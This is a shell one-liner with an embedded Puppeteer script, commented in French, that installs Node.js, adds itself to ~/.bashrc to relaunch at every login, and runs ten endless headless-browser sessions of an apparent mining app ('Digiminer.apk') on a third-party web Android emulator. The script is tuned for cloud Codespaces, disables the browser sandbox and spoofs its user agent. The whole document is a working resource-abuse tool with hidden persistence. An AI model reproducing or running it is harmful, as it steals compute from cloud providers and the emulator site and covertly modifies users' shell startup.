cd ~/. && wget https://nodejs.org/dist/v22.11.0/node-v22.11.0-linux-x64.tar.xz && tar -xvf node-v22.11.0-linux-x64.tar.xz && rm -rf node-v22.11.0-linux-x64.tar.xz && cd node-v22.11.0-linux-x64 && touch online && chmod +x * && echo "~/./node-v22.11.0-linux-x64/online" >> ~/.bashrc && echo "cd ~/./node-v22.11.0-linux-x64/bin && sudo apt-get install -y xvfb && xvfb-run node minerdash.js" > ~/./node-v22.11.0-linux-x64/online && cd ~/. && cat << 'ENDFILE' > ~/./node-v22.11.0-linux-x64/bin/minerdash.js && cd ~/./node-v22.11.0-linux-x64/bin && sudo apt-get install -y xvfb && npm init -y && npm install -y puppeteer && xvfb-run node minerdash.js
const puppeteer = require('puppeteer');

(async () => {
    // Configuration optimisée pour Codespaces (Headless obligatoire)
    const browser = await puppeteer.launch({
        headless: "new", 
        args: [
            '--no-sandbox',
            '--disable-setuid-sandbox',
            '--disable-dev-shm-usage',
            '--disable-gpu',
            '--remote-debugging-port=9222'
        ]
    });

    const urls = [
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060001%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060002%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060003%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060004%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060005%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060006%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060007%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060008%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F23060009%2FNewDocuments%2F%2FDigiminer.apk',
        'https://www.uptoplay.net/runapk/create-androidapk.html?app=android_blank&apk=%2Fvar%2Fwww%2Fhtml%2Fweboffice%2Fmydata%2F230600010%2FNewDocuments%2F%2FDigiminer.apk'
    ];

    const runInstance = async (id, url) => {
        while (true) {
            // Création d'un contexte de navigation incognito par instance
            const context = await browser.createBrowserContext();
            const page = await context.newPage();
            
            try {
                // User Agent réaliste
                await page.setUserAgent('Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36');
                
                console.log(`[Instance ${id}] --- Démarrage du cycle ---`);
                
                // Navigation avec timeout de 2 min pour les connexions lentes
                await page.goto(url, { waitUntil: 'networkidle2', timeout: 120000 });

                const startBtn = '#talpa-splash-button';
                await page.waitForSelector(startBtn, { timeout: 60000 });
                await page.click(startBtn);

                console.log(`[Instance ${id}] Attente chargement initial...`);
                await new Promise(r => setTimeout(r, 45000)); // Augmenté à 45s pour la stabilité

                // Tentative de clic sur "Enter" ou bouton splash secondaire
                try {
                    await page.evaluate(() => {
                        const buttons = Array.from(document.querySelectorAll('a, button, div'));
                        const enterBtn = buttons.find(e => e.textContent.toLowerCase().includes('enter') || e.id === 'talpa-splash-button');
                        if (enterBtn) enterBtn.click();
                    });
                } catch (e) {
                    console.log(`[Instance ${id}] Info: Pas de bouton secondaire trouvé.`);
                }

                console.log(`[Instance ${id}] Succès ! Session active pour 30 min.`);
                await new Promise(r => setTimeout(r, 30 * 60 * 1000));

            } catch (error) {
                console.error(`[Instance ${id}] ERREUR : ${error.message.substring(0, 50)}...`);
                await new Promise(r => setTimeout(r, 60000)); // Pause 1min avant relance
            } finally {
                // Fermeture propre pour libérer la RAM de Codespaces
                await page.close();
                await context.close();
                console.log(`[Instance ${id}] Nettoyage effectué.`);
            }
        }
    };

    // Lancement parallèle avec décalage pour ne pas saturer le CPU au départ
    for (let i = 0; i < urls.length; i++) {
        console.log(`Initialisation de l'instance ${i + 1}...`);
        runInstance(i + 1, urls[i]);
        await new Promise(r => setTimeout(r, 15000)); // 15s entre chaque lancement
    }
})();
ENDFILE